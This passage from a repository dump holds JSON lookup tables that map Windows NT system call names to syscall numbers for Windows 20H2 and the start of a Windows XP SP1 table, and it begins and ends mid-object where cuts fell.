"NtCompressKey": "159", "NtConnectPort": "160", "NtContinueEx": "161", "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter": "162", "NtCreateCrossVmEvent": "163", "NtCreateCrossVmMutant": "164", "NtCreateDebugObject": "165", "NtCreateDirectoryObject": "166", "NtCreateDirectoryObjectEx": "167", "NtCreateEnclave": "168", "NtCreateEnlistment": "169", "NtCreateEventPair": "170", "NtCreateIRTimer": "171", "NtCreateIoCompletion": "172", "NtCreateJobObject": "173", "NtCreateJobSet": "174", "NtCreateKeyTransacted": "175", "NtCreateKeyedEvent": "176", "NtCreateLowBoxToken": "177", "NtCreateMailslotFile": "178", "NtCreateMutant": "179", "NtCreateNamedPipeFile": "180", "NtCreatePagingFile": "181", "NtCreatePartition": "182", "NtCreatePort": "183", "NtCreatePrivateNamespace": "184", "NtCreateProcess": "185", "NtCreateProfile": "186", "NtCreateProfileEx": "187", "NtCreateRegistryTransaction": "188", "NtCreateResourceManager": "189", "NtCreateSectionEx": "190", "NtCreateSemaphore": "191", "NtCreateSymbolicLinkObject": "192", "NtCreateThreadEx": "193", "NtCreateTimer": "194", "NtCreateTimer2": "195", "NtCreateToken": "196", "NtCreateTokenEx": "197", "NtCreateTransaction": "198", "NtCreateTransactionManager": "199", "NtCreateUserProcess": "200", "NtCreateWaitCompletionPacket": "201", "NtCreateWaitablePort": "202", "NtCreateWnfStateName": "203", "NtCreateWorkerFactory": "204", "NtDebugActiveProcess": "205", "NtDebugContinue": "206", "NtDeleteAtom": "207", "NtDeleteBootEntry": "208", "NtDeleteDriverEntry": "209", "NtDeleteFile": "210", "NtDeleteKey": "211", "NtDeleteObjectAuditAlarm": "212", "NtDeletePrivateNamespace": "213", "NtDeleteValueKey": "214", "NtDeleteWnfStateData": "215", "NtDeleteWnfStateName": "216", "NtDirectGraphicsCall": "217", "NtDisableLastKnownGood": "218", "NtDisplayString": "219", "NtDrawText": "220", "NtEnableLastKnownGood": "221", "NtEnumerateBootEntries": "222", "NtEnumerateDriverEntries": "223", "NtEnumerateSystemEnvironmentValuesEx": "224", "NtEnumerateTransactionObject": "225", "NtExtendSection": "226", "NtFilterBootOption": "227", "NtFilterToken": "228", "NtFilterTokenEx": "229", "NtFlushBuffersFileEx": "230", "NtFlushInstallUILanguage": "231", "NtFlushInstructionCache": "232", "NtFlushKey": "233", "NtFlushProcessWriteBuffers": "234", "NtFlushVirtualMemory": "235", "NtFlushWriteBuffer": "236", "NtFreeUserPhysicalPages": "237", "NtFreezeRegistry": "238", "NtFreezeTransactions": "239", "NtGetCachedSigningLevel": "240", "NtGetCompleteWnfStateSubscription": "241", "NtGetContextThread": "242", "NtGetCurrentProcessorNumber": "243", "NtGetCurrentProcessorNumberEx": "244", "NtGetDevicePowerState": "245", "NtGetMUIRegistryInfo": "246", "NtGetNextProcess": "247", "NtGetNextThread": "248", "NtGetNlsSectionPtr": "249", "NtGetNotificationResourceManager": "250", "NtGetWriteWatch": "251", "NtImpersonateAnonymousToken": "252", "NtImpersonateThread": "253", "NtInitializeEnclave": "254", "NtInitializeNlsFiles": "255", "NtInitializeRegistry": "256", "NtInitiatePowerAction": "257", "NtIsSystemResumeAutomatic": "258", "NtIsUILanguageComitted": "259", "NtListenPort": "260", "NtLoadDriver": "261", "NtLoadEnclaveData": "262", "NtLoadKey": "263", "NtLoadKey2": "264", "NtLoadKeyEx": "265", "NtLockFile": "266", "NtLockProductActivationKeys": "267", "NtLockRegistryKey": "268", "NtLockVirtualMemory": "269", "NtMakePermanentObject": "270", "NtMakeTemporaryObject": "271", "NtManageHotPatch": "272", "NtManagePartition": "273", "NtMapCMFModule": "274", "NtMapUserPhysicalPages": "275", "NtMapViewOfSectionEx": "276", "NtModifyBootEntry": "277", "NtModifyDriverEntry": "278", "NtNotifyChangeDirectoryFile": "279", "NtNotifyChangeDirectoryFileEx": "280", "NtNotifyChangeKey": "281", "NtNotifyChangeMultipleKeys": "282", "NtNotifyChangeSession": "283", "NtOpenEnlistment": "284", "NtOpenEventPair": "285", "NtOpenIoCompletion": "286", "NtOpenJobObject": "287", "NtOpenKeyEx": "288", "NtOpenKeyTransacted": "289", "NtOpenKeyTransactedEx": "290", "NtOpenKeyedEvent": "291", "NtOpenMutant": "292", "NtOpenObjectAuditAlarm": "293", "NtOpenPartition": "294", "NtOpenPrivateNamespace": "295", "NtOpenProcessToken": "296", "NtOpenRegistryTransaction": "297", "NtOpenResourceManager": "298", "NtOpenSemaphore": "299", "NtOpenSession": "300", "NtOpenSymbolicLinkObject": "301", "NtOpenThread": "302", "NtOpenTimer": "303", "NtOpenTransaction": "304", "NtOpenTransactionManager": "305", "NtPlugPlayControl": "306", "NtPrePrepareComplete": "307", "NtPrePrepareEnlistment": "308", "NtPrepareComplete": "309", "NtPrepareEnlistment": "310", "NtPrivilegeCheck": "311", "NtPrivilegeObjectAuditAlarm": "312", "NtPrivilegedServiceAuditAlarm": "313", "NtPropagationComplete": "314", "NtPropagationFailed": "315", "NtPssCaptureVaSpaceBulk": "316", "NtPulseEvent": "317", "NtQueryAuxiliaryCounterFrequency": "318", "NtQueryBootEntryOrder": "319", "NtQueryBootOptions": "320", "NtQueryDebugFilterState": "321", "NtQueryDirectoryFileEx": "322", "NtQueryDirectoryObject": "323", "NtQueryDriverEntryOrder": "324", "NtQueryEaFile": "325", "NtQueryFullAttributesFile": "326", "NtQueryInformationAtom": "327", "NtQueryInformationByName": "328", "NtQueryInformationEnlistment": "329", "NtQueryInformationJobObject": "330", "NtQueryInformationPort": "331", "NtQueryInformationResourceManager": "332", "NtQueryInformationTransaction": "333", "NtQueryInformationTransactionManager": "334", "NtQueryInformationWorkerFactory": "335", "NtQueryInstallUILanguage": "336", "NtQueryIntervalProfile": "337", "NtQueryIoCompletion": "338", "NtQueryLicenseValue": "339", "NtQueryMultipleValueKey": "340", "NtQueryMutant": "341", "NtQueryOpenSubKeys": "342", "NtQueryOpenSubKeysEx": "343", "NtQueryPortInformationProcess": "344", "NtQueryQuotaInformationFile": "345", "NtQuerySecurityAttributesToken": "346", "NtQuerySecurityObject": "347", "NtQuerySecurityPolicy": "348", "NtQuerySemaphore": "349", "NtQuerySymbolicLinkObject": "350", "NtQuerySystemEnvironmentValue": "351", "NtQuerySystemEnvironmentValueEx": "352", "NtQuerySystemInformationEx": "353", "NtQueryTimerResolution": "354", "NtQueryWnfStateData": "355", "NtQueryWnfStateNameInformation": "356", "NtQueueApcThreadEx": "357", "NtRaiseException": "358", "NtRaiseHardError": "359", "NtReadOnlyEnlistment": "360", "NtRecoverEnlistment": "361", "NtRecoverResourceManager": "362", "NtRecoverTransactionManager": "363", "NtRegisterProtocolAddressInformation": "364", "NtRegisterThreadTerminatePort": "365", "NtReleaseKeyedEvent": "366", "NtReleaseWorkerFactoryWorker": "367", "NtRemoveIoCompletionEx": "368", "NtRemoveProcessDebug": "369", "NtRenameKey": "370", "NtRenameTransactionManager": "371", "NtReplaceKey": "372", "NtReplacePartitionUnit": "373", "NtReplyWaitReplyPort": "374", "NtRequestPort": "375", "NtResetEvent": "376", "NtResetWriteWatch": "377", "NtRestoreKey": "378", "NtResumeProcess": "379", "NtRevertContainerImpersonation": "380", "NtRollbackComplete": "381", "NtRollbackEnlistment": "382", "NtRollbackRegistryTransaction": "383", "NtRollbackTransaction": "384", "NtRollforwardTransactionManager": "385", "NtSaveKey": "386", "NtSaveKeyEx": "387", "NtSaveMergedKeys": "388", "NtSecureConnectPort": "389", "NtSerializeBoot": "390", "NtSetBootEntryOrder": "391", "NtSetBootOptions": "392", "NtSetCachedSigningLevel": "393", "NtSetCachedSigningLevel2": "394", "NtSetContextThread": "395", "NtSetDebugFilterState": "396", "NtSetDefaultHardErrorPort": "397", "NtSetDefaultLocale": "398", "NtSetDefaultUILanguage": "399", "NtSetDriverEntryOrder": "400", "NtSetEaFile": "401", "NtSetHighEventPair": "402", "NtSetHighWaitLowEventPair": "403", "NtSetIRTimer": "404", "NtSetInformationDebugObject": "405", "NtSetInformationEnlistment": "406", "NtSetInformationJobObject": "407", "NtSetInformationKey": "408", "NtSetInformationResourceManager": "409", "NtSetInformationSymbolicLink": "410", "NtSetInformationToken": "411", "NtSetInformationTransaction": "412", "NtSetInformationTransactionManager": "413", "NtSetInformationVirtualMemory": "414", "NtSetInformationWorkerFactory": "415", "NtSetIntervalProfile": "416", "NtSetIoCompletion": "417", "NtSetIoCompletionEx": "418", "NtSetLdtEntries": "419", "NtSetLowEventPair": "420", "NtSetLowWaitHighEventPair": "421", "NtSetQuotaInformationFile": "422", "NtSetSecurityObject": "423", "NtSetSystemEnvironmentValue": "424", "NtSetSystemEnvironmentValueEx": "425", "NtSetSystemInformation": "426", "NtSetSystemPowerState": "427", "NtSetSystemTime": "428", "NtSetThreadExecutionState": "429", "NtSetTimer2": "430", "NtSetTimerEx": "431", "NtSetTimerResolution": "432", "NtSetUuidSeed": "433", "NtSetVolumeInformationFile": "434", "NtSetWnfProcessNotificationEvent": "435", "NtShutdownSystem": "436", "NtShutdownWorkerFactory": "437", "NtSignalAndWaitForSingleObject": "438", "NtSinglePhaseReject": "439", "NtStartProfile": "440", "NtStopProfile": "441", "NtSubscribeWnfStateChange": "442", "NtSuspendProcess": "443", "NtSuspendThread": "444", "NtSystemDebugControl": "445", "NtTerminateEnclave": "446", "NtTerminateJobObject": "447", "NtTestAlert": "448", "NtThawRegistry": "449", "NtThawTransactions": "450", "NtTraceControl": "451", "NtTranslateFilePath": "452", "NtUmsThreadYield": "453", "NtUnloadDriver": "454", "NtUnloadKey": "455", "NtUnloadKey2": "456", "NtUnloadKeyEx": "457", "NtUnlockFile": "458", "NtUnlockVirtualMemory": "459", "NtUnmapViewOfSectionEx": "460", "NtUnsubscribeWnfStateChange": "461", "NtUpdateWnfStateData": "462", "NtVdmControl": "463", "NtWaitForAlertByThreadId": "464", "NtWaitForDebugEvent": "465", "NtWaitForKeyedEvent": "466", "NtWaitForWorkViaWorkerFactory": "467", "NtWaitHighEventPair": "468", "NtWaitLowEventPair": "469", "NtLoadKey3": "470"}, "20H2": {"NtAccessCheck": "0", "NtWorkerFactoryWorkerReady": "1", "NtAcceptConnectPort": "2", "NtMapUserPhysicalPagesScatter": "3", "NtWaitForSingleObject": "4", "NtCallbackReturn": "5", "NtReadFile": "6", "NtDeviceIoControlFile": "7", "NtWriteFile": "8", "NtRemoveIoCompletion": "9", "NtReleaseSemaphore": "10", "NtReplyWaitReceivePort": "11", "NtReplyPort": "12", "NtSetInformationThread": "13", "NtSetEvent": "14", "NtClose": "15", "NtQueryObject": "16", "NtQueryInformationFile": "17", "NtOpenKey": "18", "NtEnumerateValueKey": "19", "NtFindAtom": "20", "NtQueryDefaultLocale": "21", "NtQueryKey": "22", "NtQueryValueKey": "23", "NtAllocateVirtualMemory": "24", "NtQueryInformationProcess": "25", "NtWaitForMultipleObjects32": "26", "NtWriteFileGather": "27", "NtSetInformationProcess": "28", "NtCreateKey": "29", "NtFreeVirtualMemory": "30", "NtImpersonateClientOfPort": "31", "NtReleaseMutant": "32", "NtQueryInformationToken": "33", "NtRequestWaitReplyPort": "34", "NtQueryVirtualMemory": "35", "NtOpenThreadToken": "36", "NtQueryInformationThread": "37", "NtOpenProcess": "38", "NtSetInformationFile": "39", "NtMapViewOfSection": "40", "NtAccessCheckAndAuditAlarm": "41", "NtUnmapViewOfSection": "42", "NtReplyWaitReceivePortEx": "43", "NtTerminateProcess": "44", "NtSetEventBoostPriority": "45", "NtReadFileScatter": "46", "NtOpenThreadTokenEx": "47", "NtOpenProcessTokenEx": "48", "NtQueryPerformanceCounter": "49", "NtEnumerateKey": "50", "NtOpenFile": "51", "NtDelayExecution": "52", "NtQueryDirectoryFile": "53", "NtQuerySystemInformation": "54", "NtOpenSection": "55", "NtQueryTimer": "56", "NtFsControlFile": "57", "NtWriteVirtualMemory": "58", "NtCloseObjectAuditAlarm": "59", "NtDuplicateObject": "60", "NtQueryAttributesFile": "61", "NtClearEvent": "62", "NtReadVirtualMemory": "63", "NtOpenEvent": "64", "NtAdjustPrivilegesToken": "65", "NtDuplicateToken": "66", "NtContinue": "67", "NtQueryDefaultUILanguage": "68", "NtQueueApcThread": "69", "NtYieldExecution": "70", "NtAddAtom": "71", "NtCreateEvent": "72", "NtQueryVolumeInformationFile": "73", "NtCreateSection": "74", "NtFlushBuffersFile": "75", "NtApphelpCacheControl": "76", "NtCreateProcessEx": "77", "NtCreateThread": "78", "NtIsProcessInJob": "79", "NtProtectVirtualMemory": "80", "NtQuerySection": "81", "NtResumeThread": "82", "NtTerminateThread": "83", "NtReadRequestData": "84", "NtCreateFile": "85", "NtQueryEvent": "86", "NtWriteRequestData": "87", "NtOpenDirectoryObject": "88", "NtAccessCheckByTypeAndAuditAlarm": "89", "NtQuerySystemTime": "90", "NtWaitForMultipleObjects": "91", "NtSetInformationObject": "92", "NtCancelIoFile": "93", "NtTraceEvent": "94", "NtPowerInformation": "95", "NtSetValueKey": "96", "NtCancelTimer": "97", "NtSetTimer": "98", "NtAccessCheckByType": "99", "NtAccessCheckByTypeResultList": "100", "NtAccessCheckByTypeResultListAndAuditAlarm": "101", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "102", "NtAcquireCrossVmMutant": "103", "NtAcquireProcessActivityReference": "104", "NtAddAtomEx": "105", "NtAddBootEntry": "106", "NtAddDriverEntry": "107", "NtAdjustGroupsToken": "108", "NtAdjustTokenClaimsAndDeviceGroups": "109", "NtAlertResumeThread": "110", "NtAlertThread": "111", "NtAlertThreadByThreadId": "112", "NtAllocateLocallyUniqueId": "113", "NtAllocateReserveObject": "114", "NtAllocateUserPhysicalPages": "115", "NtAllocateUserPhysicalPagesEx": "116", "NtAllocateUuids": "117", "NtAllocateVirtualMemoryEx": "118", "NtAlpcAcceptConnectPort": "119", "NtAlpcCancelMessage": "120", "NtAlpcConnectPort": "121", "NtAlpcConnectPortEx": "122", "NtAlpcCreatePort": "123", "NtAlpcCreatePortSection": "124", "NtAlpcCreateResourceReserve": "125", "NtAlpcCreateSectionView": "126", "NtAlpcCreateSecurityContext": "127", "NtAlpcDeletePortSection": "128", "NtAlpcDeleteResourceReserve": "129", "NtAlpcDeleteSectionView": "130", "NtAlpcDeleteSecurityContext": "131", "NtAlpcDisconnectPort": "132", "NtAlpcImpersonateClientContainerOfPort": "133", "NtAlpcImpersonateClientOfPort": "134", "NtAlpcOpenSenderProcess": "135", "NtAlpcOpenSenderThread": "136", "NtAlpcQueryInformation": "137", "NtAlpcQueryInformationMessage": "138", "NtAlpcRevokeSecurityContext": "139", "NtAlpcSendWaitReceivePort": "140", "NtAlpcSetInformation": "141", "NtAreMappedFilesTheSame": "142", "NtAssignProcessToJobObject": "143", "NtAssociateWaitCompletionPacket": "144", "NtCallEnclave": "145", "NtCancelIoFileEx": "146", "NtCancelSynchronousIoFile": "147", "NtCancelTimer2": "148", "NtCancelWaitCompletionPacket": "149", "NtCommitComplete": "150", "NtCommitEnlistment": "151", "NtCommitRegistryTransaction": "152", "NtCommitTransaction": "153", "NtCompactKeys": "154", "NtCompareObjects": "155", "NtCompareSigningLevels": "156", "NtCompareTokens": "157", "NtCompleteConnectPort": "158", "NtCompressKey": "159", "NtConnectPort": "160", "NtContinueEx": "161", "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter": "162", "NtCreateCrossVmEvent": "163", "NtCreateCrossVmMutant": "164", "NtCreateDebugObject": "165", "NtCreateDirectoryObject": "166", "NtCreateDirectoryObjectEx": "167", "NtCreateEnclave": "168", "NtCreateEnlistment": "169", "NtCreateEventPair": "170", "NtCreateIRTimer": "171", "NtCreateIoCompletion": "172", "NtCreateJobObject": "173", "NtCreateJobSet": "174", "NtCreateKeyTransacted": "175", "NtCreateKeyedEvent": "176", "NtCreateLowBoxToken": "177", "NtCreateMailslotFile": "178", "NtCreateMutant": "179", "NtCreateNamedPipeFile": "180", "NtCreatePagingFile": "181", "NtCreatePartition": "182", "NtCreatePort": "183", "NtCreatePrivateNamespace": "184", "NtCreateProcess": "185", "NtCreateProfile": "186", "NtCreateProfileEx": "187", "NtCreateRegistryTransaction": "188", "NtCreateResourceManager": "189", "NtCreateSectionEx": "190", "NtCreateSemaphore": "191", "NtCreateSymbolicLinkObject": "192", "NtCreateThreadEx": "193", "NtCreateTimer": "194", "NtCreateTimer2": "195", "NtCreateToken": "196", "NtCreateTokenEx": "197", "NtCreateTransaction": "198", "NtCreateTransactionManager": "199", "NtCreateUserProcess": "200", "NtCreateWaitCompletionPacket": "201", "NtCreateWaitablePort": "202", "NtCreateWnfStateName": "203", "NtCreateWorkerFactory": "204", "NtDebugActiveProcess": "205", "NtDebugContinue": "206", "NtDeleteAtom": "207", "NtDeleteBootEntry": "208", "NtDeleteDriverEntry": "209", "NtDeleteFile": "210", "NtDeleteKey": "211", "NtDeleteObjectAuditAlarm": "212", "NtDeletePrivateNamespace": "213", "NtDeleteValueKey": "214", "NtDeleteWnfStateData": "215", "NtDeleteWnfStateName": "216", "NtDirectGraphicsCall": "217", "NtDisableLastKnownGood": "218", "NtDisplayString": "219", "NtDrawText": "220", "NtEnableLastKnownGood": "221", "NtEnumerateBootEntries": "222", "NtEnumerateDriverEntries": "223", "NtEnumerateSystemEnvironmentValuesEx": "224", "NtEnumerateTransactionObject": "225", "NtExtendSection": "226", "NtFilterBootOption": "227", "NtFilterToken": "228", "NtFilterTokenEx": "229", "NtFlushBuffersFileEx": "230", "NtFlushInstallUILanguage": "231", "NtFlushInstructionCache": "232", "NtFlushKey": "233", "NtFlushProcessWriteBuffers": "234", "NtFlushVirtualMemory": "235", "NtFlushWriteBuffer": "236", "NtFreeUserPhysicalPages": "237", "NtFreezeRegistry": "238", "NtFreezeTransactions": "239", "NtGetCachedSigningLevel": "240", "NtGetCompleteWnfStateSubscription": "241", "NtGetContextThread": "242", "NtGetCurrentProcessorNumber": "243", "NtGetCurrentProcessorNumberEx": "244", "NtGetDevicePowerState": "245", "NtGetMUIRegistryInfo": "246", "NtGetNextProcess": "247", "NtGetNextThread": "248", "NtGetNlsSectionPtr": "249", "NtGetNotificationResourceManager": "250", "NtGetWriteWatch": "251", "NtImpersonateAnonymousToken": "252", "NtImpersonateThread": "253", "NtInitializeEnclave": "254", "NtInitializeNlsFiles": "255", "NtInitializeRegistry": "256", "NtInitiatePowerAction": "257", "NtIsSystemResumeAutomatic": "258", "NtIsUILanguageComitted": "259", "NtListenPort": "260", "NtLoadDriver": "261", "NtLoadEnclaveData": "262", "NtLoadKey": "263", "NtLoadKey2": "264", "NtLoadKeyEx": "265", "NtLockFile": "266", "NtLockProductActivationKeys": "267", "NtLockRegistryKey": "268", "NtLockVirtualMemory": "269", "NtMakePermanentObject": "270", "NtMakeTemporaryObject": "271", "NtManageHotPatch": "272", "NtManagePartition": "273", "NtMapCMFModule": "274", "NtMapUserPhysicalPages": "275", "NtMapViewOfSectionEx": "276", "NtModifyBootEntry": "277", "NtModifyDriverEntry": "278", "NtNotifyChangeDirectoryFile": "279", "NtNotifyChangeDirectoryFileEx": "280", "NtNotifyChangeKey": "281", "NtNotifyChangeMultipleKeys": "282", "NtNotifyChangeSession": "283", "NtOpenEnlistment": "284", "NtOpenEventPair": "285", "NtOpenIoCompletion": "286", "NtOpenJobObject": "287", "NtOpenKeyEx": "288", "NtOpenKeyTransacted": "289", "NtOpenKeyTransactedEx": "290", "NtOpenKeyedEvent": "291", "NtOpenMutant": "292", "NtOpenObjectAuditAlarm": "293", "NtOpenPartition": "294", "NtOpenPrivateNamespace": "295", "NtOpenProcessToken": "296", "NtOpenRegistryTransaction": "297", "NtOpenResourceManager": "298", "NtOpenSemaphore": "299", "NtOpenSession": "300", "NtOpenSymbolicLinkObject": "301", "NtOpenThread": "302", "NtOpenTimer": "303", "NtOpenTransaction": "304", "NtOpenTransactionManager": "305", "NtPlugPlayControl": "306", "NtPrePrepareComplete": "307", "NtPrePrepareEnlistment": "308", "NtPrepareComplete": "309", "NtPrepareEnlistment": "310", "NtPrivilegeCheck": "311", "NtPrivilegeObjectAuditAlarm": "312", "NtPrivilegedServiceAuditAlarm": "313", "NtPropagationComplete": "314", "NtPropagationFailed": "315", "NtPssCaptureVaSpaceBulk": "316", "NtPulseEvent": "317", "NtQueryAuxiliaryCounterFrequency": "318", "NtQueryBootEntryOrder": "319", "NtQueryBootOptions": "320", "NtQueryDebugFilterState": "321", "NtQueryDirectoryFileEx": "322", "NtQueryDirectoryObject": "323", "NtQueryDriverEntryOrder": "324", "NtQueryEaFile": "325", "NtQueryFullAttributesFile": "326", "NtQueryInformationAtom": "327", "NtQueryInformationByName": "328", "NtQueryInformationEnlistment": "329", "NtQueryInformationJobObject": "330", "NtQueryInformationPort": "331", "NtQueryInformationResourceManager": "332", "NtQueryInformationTransaction": "333", "NtQueryInformationTransactionManager": "334", "NtQueryInformationWorkerFactory": "335", "NtQueryInstallUILanguage": "336", "NtQueryIntervalProfile": "337", "NtQueryIoCompletion": "338", "NtQueryLicenseValue": "339", "NtQueryMultipleValueKey": "340", "NtQueryMutant": "341", "NtQueryOpenSubKeys": "342", "NtQueryOpenSubKeysEx": "343", "NtQueryPortInformationProcess": "344", "NtQueryQuotaInformationFile": "345", "NtQuerySecurityAttributesToken": "346", "NtQuerySecurityObject": "347", "NtQuerySecurityPolicy": "348", "NtQuerySemaphore": "349", "NtQuerySymbolicLinkObject": "350", "NtQuerySystemEnvironmentValue": "351", "NtQuerySystemEnvironmentValueEx": "352", "NtQuerySystemInformationEx": "353", "NtQueryTimerResolution": "354", "NtQueryWnfStateData": "355", "NtQueryWnfStateNameInformation": "356", "NtQueueApcThreadEx": "357", "NtRaiseException": "358", "NtRaiseHardError": "359", "NtReadOnlyEnlistment": "360", "NtRecoverEnlistment": "361", "NtRecoverResourceManager": "362", "NtRecoverTransactionManager": "363", "NtRegisterProtocolAddressInformation": "364", "NtRegisterThreadTerminatePort": "365", "NtReleaseKeyedEvent": "366", "NtReleaseWorkerFactoryWorker": "367", "NtRemoveIoCompletionEx": "368", "NtRemoveProcessDebug": "369", "NtRenameKey": "370", "NtRenameTransactionManager": "371", "NtReplaceKey": "372", "NtReplacePartitionUnit": "373", "NtReplyWaitReplyPort": "374", "NtRequestPort": "375", "NtResetEvent": "376", "NtResetWriteWatch": "377", "NtRestoreKey": "378", "NtResumeProcess": "379", "NtRevertContainerImpersonation": "380", "NtRollbackComplete": "381", "NtRollbackEnlistment": "382", "NtRollbackRegistryTransaction": "383", "NtRollbackTransaction": "384", "NtRollforwardTransactionManager": "385", "NtSaveKey": "386", "NtSaveKeyEx": "387", "NtSaveMergedKeys": "388", "NtSecureConnectPort": "389", "NtSerializeBoot": "390", "NtSetBootEntryOrder": "391", "NtSetBootOptions": "392", "NtSetCachedSigningLevel": "393", "NtSetCachedSigningLevel2": "394", "NtSetContextThread": "395", "NtSetDebugFilterState": "396", "NtSetDefaultHardErrorPort": "397", "NtSetDefaultLocale": "398", "NtSetDefaultUILanguage": "399", "NtSetDriverEntryOrder": "400", "NtSetEaFile": "401", "NtSetHighEventPair": "402", "NtSetHighWaitLowEventPair": "403", "NtSetIRTimer": "404", "NtSetInformationDebugObject": "405", "NtSetInformationEnlistment": "406", "NtSetInformationJobObject": "407", "NtSetInformationKey": "408", "NtSetInformationResourceManager": "409", "NtSetInformationSymbolicLink": "410", "NtSetInformationToken": "411", "NtSetInformationTransaction": "412", "NtSetInformationTransactionManager": "413", "NtSetInformationVirtualMemory": "414", "NtSetInformationWorkerFactory": "415", "NtSetIntervalProfile": "416", "NtSetIoCompletion": "417", "NtSetIoCompletionEx": "418", "NtSetLdtEntries": "419", "NtSetLowEventPair": "420", "NtSetLowWaitHighEventPair": "421", "NtSetQuotaInformationFile": "422", "NtSetSecurityObject": "423", "NtSetSystemEnvironmentValue": "424", "NtSetSystemEnvironmentValueEx": "425", "NtSetSystemInformation": "426", "NtSetSystemPowerState": "427", "NtSetSystemTime": "428", "NtSetThreadExecutionState": "429", "NtSetTimer2": "430", "NtSetTimerEx": "431", "NtSetTimerResolution": "432", "NtSetUuidSeed": "433", "NtSetVolumeInformationFile": "434", "NtSetWnfProcessNotificationEvent": "435", "NtShutdownSystem": "436", "NtShutdownWorkerFactory": "437", "NtSignalAndWaitForSingleObject": "438", "NtSinglePhaseReject": "439", "NtStartProfile": "440", "NtStopProfile": "441", "NtSubscribeWnfStateChange": "442", "NtSuspendProcess": "443", "NtSuspendThread": "444", "NtSystemDebugControl": "445", "NtTerminateEnclave": "446", "NtTerminateJobObject": "447", "NtTestAlert": "448", "NtThawRegistry": "449", "NtThawTransactions": "450", "NtTraceControl": "451", "NtTranslateFilePath": "452", "NtUmsThreadYield": "453", "NtUnloadDriver": "454", "NtUnloadKey": "455", "NtUnloadKey2": "456", "NtUnloadKeyEx": "457", "NtUnlockFile": "458", "NtUnlockVirtualMemory": "459", "NtUnmapViewOfSectionEx": "460", "NtUnsubscribeWnfStateChange": "461", "NtUpdateWnfStateData": "462", "NtVdmControl": "463", "NtWaitForAlertByThreadId": "464", "NtWaitForDebugEvent": "465", "NtWaitForKeyedEvent": "466", "NtWaitForWorkViaWorkerFactory": "467", "NtWaitHighEventPair": "468", "NtWaitLowEventPair": "469", "NtLoadKey3": "470"}}} ================================================ FILE: start/reverseWinSyscallsInt.json ================================================ {"Windows XP": {"SP1": {"NtMapUserPhysicalPagesScatter": 0, "NtWaitForSingleObject": 1, "NtCallbackReturn": 2, "NtReadFile": 3, "NtDeviceIoControlFile": 4, "NtWriteFile": 5, "NtRemoveIoCompletion": 6, "NtReleaseSemaphore": 7, "NtReplyWaitReceivePort": 8, "NtReplyPort": 9, "NtSetInformationThread": 10, "NtSetEvent": 11, "NtClose": 12, "NtQueryObject": 13, "NtQueryInformationFile": 14, "NtOpenKey": 15, "NtEnumerateValueKey": 16, "NtFindAtom": 17, "NtQueryDefaultLocale": 18, "NtQueryKey": 19, "NtQueryValueKey": 20, "NtAllocateVirtualMemory": 21, "NtQueryInformationProcess": 22, "NtWaitForMultipleObjects32": 23, "NtWriteFileGather": 24, "NtSetInformationProcess": 25, "NtCreateKey": 26, "NtFreeVirtualMemory": 27, "NtImpersonateClientOfPort": 28, "NtReleaseMutant": 29, "NtQueryInformationToken": 30, "NtRequestWaitReplyPort": 31, "NtQueryVirtualMemory": 32, "NtOpenThreadToken": 33, "NtQueryInformationThread": 34, "NtOpenProcess": 35, "NtSetInformationFile": 36, "NtMapViewOfSection": 37, "NtAccessCheckAndAuditAlarm": 38, "NtUnmapViewOfSection": 39, "NtReplyWaitReceivePortEx": 40, "NtTerminateProcess": 41, "NtSetEventBoostPriority": 42, "NtReadFileScatter": 43, "NtOpenThreadTokenEx": 44, "NtOpenProcessTokenEx": 45, "NtQueryPerformanceCounter": 46, "NtEnumerateKey": 47, "NtOpenFile": 48, "NtDelayExecution": 49, "NtQueryDirectoryFile": 50, "NtQuerySystemInformation": 51, "NtOpenSection": 52, "NtQueryTimer": 53, "NtFsControlFile": 54, "NtWriteVirtualMemory": 55, "NtCloseObjectAuditAlarm": 56, "NtDuplicateObject": 57, "NtQueryAttributesFile": 58, "NtClearEvent": 59, "NtReadVirtualMemory": 60, "NtOpenEvent": 61, "NtAdjustPrivilegesToken": 62, "NtDuplicateToken": 63, "NtContinue": 64, "NtQueryDefaultUILanguage": 65, "NtQueueApcThread": 66, "NtYieldExecution": 67, "NtAddAtom": 68, "NtCreateEvent": 69, "NtQueryVolumeInformationFile": 70, "NtCreateSection": 71, "NtFlushBuffersFile": 72, "NtApphelpCacheControl": 73, "NtCreateProcessEx": 74, "NtCreateThread": 75, "NtIsProcessInJob": 76, "NtProtectVirtualMemory": 77, "NtQuerySection": 78, "NtResumeThread": 79, "NtTerminateThread": 80, "NtReadRequestData": 81, "NtCreateFile": 82, "NtQueryEvent": 83, "NtWriteRequestData": 84, "NtOpenDirectoryObject": 85, "NtAccessCheckByTypeAndAuditAlarm": 86, "NtQuerySystemTime": 87, "NtWaitForMultipleObjects": 88, "NtSetInformationObject": 89, "NtCancelIoFile": 90, "NtTraceEvent": 91, "NtPowerInformation": 92, "NtSetValueKey": 93, "NtCancelTimer": 94, "NtSetTimer": 95, "NtAcceptConnectPort": 96, "NtAccessCheck": 97, "NtAccessCheckByType": 98, "NtAccessCheckByTypeResultList": 99, "NtAccessCheckByTypeResultListAndAuditAlarm": 100, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 101, "NtAddBootEntry": 102, "NtAddDriverEntry": 103, "NtAdjustGroupsToken": 104, "NtAlertResumeThread": 105, "NtAlertThread": 106, "NtAllocateLocallyUniqueId": 107, "NtAllocateUserPhysicalPages": 108, "NtAllocateUuids": 109, "NtAreMappedFilesTheSame": 110, "NtAssignProcessToJobObject": 111, "NtCancelDeviceWakeupRequest": 112, "NtCompactKeys": 113, "NtCompareTokens": 114, "NtCompleteConnectPort": 115, "NtCompressKey": 116, "NtConnectPort": 117, "NtCreateDebugObject": 118, "NtCreateDirectoryObject": 119, "NtCreateEventPair": 120, "NtCreateIoCompletion": 121, "NtCreateJobObject": 122, "NtCreateJobSet": 123, "NtCreateKeyedEvent": 124, "NtCreateMailslotFile": 125, "NtCreateMutant": 126, "NtCreateNamedPipeFile": 127, "NtCreatePagingFile": 128, "NtCreatePort": 129, "NtCreateProcess": 130, "NtCreateProfile": 131, "NtCreateSemaphore": 132, "NtCreateSymbolicLinkObject": 133, "NtCreateTimer": 134, "NtCreateToken": 135, "NtCreateWaitablePort": 136, "NtDebugActiveProcess": 137, "NtDebugContinue": 138, "NtDeleteAtom": 139, "NtDeleteBootEntry": 140, "NtDeleteDriverEntry": 141, "NtDeleteFile": 142, "NtDeleteKey": 143, "NtDeleteObjectAuditAlarm": 144, 